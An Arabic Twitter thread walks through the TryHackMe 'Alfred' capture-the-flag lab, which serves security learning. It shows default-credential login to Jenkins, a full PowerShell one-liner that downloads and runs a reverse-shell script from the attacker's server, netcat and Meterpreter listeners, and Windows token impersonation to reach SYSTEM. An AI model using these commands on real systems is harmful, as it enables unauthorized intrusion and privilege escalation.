شريف.
شريف.

@Shr3fi

25 تغريدة 12 قراءة Feb 06, 2023
السلام عليكم ,
كتبت عن تقرير عن لاب Alfred من موقع TryHackMe
وصراحة لاب اعجبني مرة وتعلمت منه كثير وحبيت اكتب طريقة حلها وعساه يعجبكم ..
نبدأ
عندنا هدف عبارة عن جهاز وهو Jenkins وهدفنا استغلال الثغرة للوصول الى النظام وبعدها نصعد الصلاحية باستغلالها عن طريق windows tokens .
في البداية :
بنستعمل Nmap الفحص على الجهاز 10.10.76.58 بالأوامر كالتالي
Nmap -sV -vv -Pn 10.10.76.58
حصلنا 3 منافذ مفتوحة :
80 /TCP ( Microsoft IIS )
3389/TCP ( it is used to Remote Desktop Protocol “RDP” )
8080/TCP (“ Jetty “ اسم الويب سيرفر )
نظام تشغيل الجهاز هو ويندوز
الحين بنروح للمتصفح ونكتب IP الهدف ونشوف وش اللي يظهر لنا
ياحليله Alfred يبي تبرعات لـBruce Wayne شكله مايدري هو اللي خلص الفلوس كلها اصلا :)
الحين بنجرب IP مع منفذ 8080 لأنه ويب سيرفر وبنشوف وش يظهر لنا
- حلو, طلع لنا صفحة تسجيل الدخول.
احيانا عشان بتجرب تسجل دخول لأول مرة وانت ماتعرف اي شي عنها هو admin/admin بس بنبحث بقوقل عن التسجيل الدخول المعروف لـ Jenkins :
مثل ماهو واضح اسم المستخدم وكلمة المرور نفسها admin/admin بنجرب عليه
حلو, سجلنا دخول !!
الحين بنبحث عن أداة تسمح لنا اننا نكتب فيها اوامر على النظام عشان نسوي Reverse Shell على جهازي ونرفع Shell بجهاز الهدف.
اولا, بنحصل الأداة نضغط على
Project > Config :
حصلناها, قبل لا نستخدم الأداة بنحمل على جهازنا Shell عشان نرفعها على جهاز الهدف..
اذا حملت nishang بتحصل اكثر من شيل واحد وبستفيد منها بأشياء ثانية.
ولكن نبي Shell اسمه
Invoke-PowerShellTCP.ps1
بتحصلون Shell المطلوب ..
github.com
نشغل http server عشان نسحب Shell من جهازنا نفتح Terminal ونكتب :
python3 -m http.server 80
ملاحظة : اذا تبي تسحب الملف من جهازك للجهاز الهدف لازم قبل لا تكتب الامر تكون في نفس المسار الموجود فيه Shell.
ثانيا : شغل Netcat للإستماع على المنفذ اللي تبيه, طبعا انا استعملت منفذ :
nc -nlvp 4444
الحين بنرفع Shell على جهاز الهدف بأمر :
powershell iex (New-Object Net.WebClient).DownloadString('http://(your-IP):(your-port)/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress (your-ip) -Port (your-port)
نكتبها ونتجه للجهاز الهدف ونفعل Shell :
ملاحظة :
"اذا قرأت الاوامر بتلاحظ يطلب منك IP والمنفذ طبعا بوقت التحميل انت بتنزلها على المنفذ اللي انت تحددها وبعدها انت تطلب منه لا رفعت Shell تقوله شغلها لي علىIP الخاص بي والمنفذ اللي محتاج تستمع فيه يعني تتصل فيه بوقت Reverse Shell"
نفعل الأمر على النظام ونضغط على Built in ونشوف نزل على الجهاز او لا
حلو حلو اشتغل الحمدلله وصلنا للجهاز الهدف.
الحين بنبحث على اول علم بأسم ملف user.txt :
حصلنا اسم مستخدم بأسم Bruce وطبعا بنروح للـDesktop ونشوف وش فيها وحصلنا أول علم الحمدلله.
الحين لازم ناصل للـ Meterpreter عشان نصعد الصلاحية ونصير Admin للجهاز.
اول شي ننشأ ملف Shell خاص فينا عن طريق أداة msfvenom :
الحين بننزل Shell على جهاز الهدف
نشيك على http server وش يظهر لنا
حلو تم التحميل.
قبل لا نبدأ ونشغل Shell بنروح لأداة Metasploit للإستماع
لـ Shell اللي انشأناه :
الحين بنشغل ملفنا Shell اللي نزلناه على جهاز الهدف
حلو الجلسة فتحت والحين وصلنا لـMeterpreter .
الحين نبي نشوف وش الصلاحيات اللي نقدر نستعملها بأمر shell :
ظهر لنا اثنين من الصلاحيات اللي نقدر نستعملها وهي مفعله الا وهي :
( SeDebugPrivilege, SeImpersonatePrivilege )
بنشيك على Tokens المتوفرة وكيف نقدر نشوف بأمر
( list_token -g ) :
حصلنا Token المتوفر بأسم BUILTIN/Administrators
الحين بنكتب امر Impersonate_token ونحدد Token اللي نبي نستعمله :
اخيرا صرنا Admin على الجهاز لكن محتاجين نحافظ على الاتصال اللي بيننا عشان ماينقطع ونحتاج نربط اتصالنا في Process آخر .
بنختار NT AUTHORITY\SYSTEM مستخدم
PID
اسمه services.exe
رقمه 668 :
الحين صرنا Admin على الجهاز وحافظنا على الاتصال الحين بنبحث على اخر Flag :
-حصلنا اخر Flag وانتهينا , شكرا لكم.

جاري تحميل الاقتراحات...